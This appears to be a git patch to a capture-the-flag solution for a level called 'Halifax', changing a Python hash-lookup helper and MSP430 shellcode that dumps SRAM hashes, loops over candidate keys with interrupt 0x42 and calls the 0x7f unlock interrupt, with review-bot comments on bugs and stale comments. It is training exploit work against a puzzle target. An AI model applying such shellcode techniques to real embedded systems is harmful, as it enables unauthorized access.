From 65153756943bfe0b39de477d08dfdbd2822040c7 Mon Sep 17 00:00:00 2001 From: Val Date: Tue, 4 Jul 2023 19:23:11 -0500 Subject: [PATCH] 25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 --- 25-Halifax/halifax.py | 2 +- 25-Halifax/shellcode.asm | 76 +++++++++++++++------------------------- 2 files changed, 30 insertions(+), 48 deletions(-) diff --git a/25-Halifax/halifax.py b/25-Halifax/halifax.py index 62b367a..bcdb08f 100644 --- a/25-Halifax/halifax.py +++ b/25-Halifax/halifax.py @@ -50,7 +50,7 @@ def main(): key = target[loc:loc+depth] try: value = all_hashes[key] - print(f"{value:x}", end="") + print(f"{value:02x}", end="") except KeyError: value = 0x00 diff --git a/25-Halifax/shellcode.asm b/25-Halifax/shellcode.asm index e4179e0..60dcc1d 100644 --- a/25-Halifax/shellcode.asm +++ b/25-Halifax/shellcode.asm @@ -5,9 +5,9 @@ const: .define msize 0x1 ; length of each hash in bytes .define hsize 0x3 ; bytes kept per hash (only needs to be 3 to determine 1 byte of sram) -.define slen 0x140 ; number of bytes in sram to dump -.define olen 0x3c0 ; number of bytes in hash array -.define oaddr 0x7000 ; address of the big hash array +.define sr_len 0x140 ; number of bytes in sram to dump +.define ha_len 0x3c0 ; number of bytes in hash array (hsize * sr_len) +.define haddr 0x7000 ; address of the big hash array .define iaddr 0x8000 ; address of the sram input buffer .define kaddr 0x9000 ; address of the key buffer external_data: 
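Review bot: The `02x` zero-padding is right, but the `print` still sits inside the `try`, so the `except KeyError` path assigns `value = 0x00` and, as far as the hunk shows, never emits it — a miss would shift every following byte in the hex output. Unless a second print follows after the hunk, hoist the lookup and print once: `value = all_hashes.get(key, 0x00)` then `print(f"{value:02x}", end="")`. main() starts before this hunk and continues past it.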
@@ -23,37 +23,27 @@ external_func: .define puts #0x4586 ; memcpy(void *dest, void *src, size_t len) .define memcpy #0x45a4 -; sha256_internal(void * sram_addr, size_t sram_len, void * sha_buf) +; sha256_internal(void * sram_addr, size_t sr_len, void * sha_buf) .define sha256_internal #0x45b6 ; memset(void* buf, char value, size_t length) .define memset #0x45c8 -setup_variables: -push r4 -push r5 -push r6 -push r7 -mov #msize, r4 ; message_size -mov #hsize, r5 ; bytes_per_hash -mov #slen, r6 ; sram_length -mov #olen, r7 ; output_length - get_sram_hashes: clr r11 ; loop variable in r11 -mov r4, r14 ; r14 = 1 -mov #oaddr, r13 ; set destination to 0x8000 +mov #msize, r14 ; r14 = 1 +mov #haddr, r13 ; set destination to 0x8000 sr_loop: mov r11, r15 ; mov addr r15 call sha256_internal; -add r5, r13 ; keep 3 bytes of the output +add #hsize, r13 ; keep 3 bytes of the output inc r11 ; inc r11 -cmp r6, r11 ; do that 0x1000 times +cmp #sr_len, r11 ; do that 0x1000 times jnc sr_loop print_hex: clr r11; ph_loop: -mov.b oaddr(r11), r14 +mov.b haddr(r11), r14 mov.b r14, r15 rra r15 ; using rra here instead of rra.b means the value won't roll into the highest bit rra r15 ; which negates the need to and 0xf, r15 @@ -66,7 +56,7 @@ call putchar ; mov.b HEX_LUT(r14), r15 call putchar ; inc r11 ; inc r11 -cmp r7, r11 ; do that sram_length*3 times +cmp #ha_len, r11 ; do that sram_length*3 times jnc ph_loop mov.b #0xa, r15 ; '\n' 
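Review bot: Two comments in get_sram_hashes are now stale against the values defined in the earlier hunk: `mov #haddr, r13 ; set destination to 0x8000` names 0x8000 while haddr is 0x7000 (0x8000 is iaddr, the input buffer), and `cmp #sr_len, r11 ; do that 0x1000 times` says 0x1000 while sr_len is 0x140. Suggest `mov #haddr, r13 ; set destination to the hash array (0x7000)` and `cmp #sr_len, r11 ; do that sr_len (0x140) times`. The same applies to the print_hex hunk below, where `; do that sram_length*3 times` could now say `; ha_len = hsize * sr_len` since the constant exists.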
@@ -75,43 +65,35 @@ call #0x4578 ; putchar ('\n') take_input: ; 3e4040003f400090b0126845 -mov r6, r14 +mov #sr_len, r14 mov #iaddr, r15 call getsn ; check_all_passwords: -;for i in 0..slen: -clr r9 +;for i in 0..sr_len: +clr r9 pw_loop: -; memset(kaddr, 0, 0x20) -mov #20, r13 -clr r14 -mov #kaddr, r15 -call memset - ; memcpy(kaddr, iaddr + i, len) -mov #10, r13 -mov #iaddr, r14 -add r9, r14 -mov #kaddr, r15 -call memcpy -; sha256_internal(s_addr, len, kaddr) -mov #kaddr, r13 ; set buffer to 0x9000 -mov #0x0010, r14 ; set length to 0x10 -mov r9, r15 -call sha256_internal +mov #10, r13 +mov #iaddr, r14 +add r9, r14 +mov #kaddr, r15 +call memcpy +; INT (0x42, key) +push #kaddr +push #42 +call INT +add #4, sp ; INT(7f) unlock7f: -mov #0x7f, r15 +push #0 +push #0 +push #7f call INT - +add #6, sp inc r9 -cmp r6, r9 +cmp #sr_len, r9 jl pw_loop -teardown_variables: -pop r7 -pop r6 -pop r5 -pop r4 +end: ret
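Review bot: The immediates `push #42` and `push #7f` do not match the commit's stated intent (`INT 0x42`) unless the assembler reads unprefixed digits as hex; everywhere else in the file hex carries an explicit prefix (`.define sr_len 0x140`, the removed `mov #0x7f, r15`), and `7f` is not a decimal literal at all, so `push #0x42` and `push #0x7f` are the unambiguous spelling. The same question applies to `mov #10, r13` for the memcpy length, which the removed code wrote as `#0x0010` for the matching sha256 call. Dropping the memset also means only the first copied bytes of the key buffer are rewritten each iteration while the rest keep whatever was there before; whether INT 0x42 reads past them is not visible here. The loop's `cmp #sr_len, r9` / `jl pw_loop` uses a signed branch where the other two loops use `jnc`; both work for 0x140, but one convention would read better.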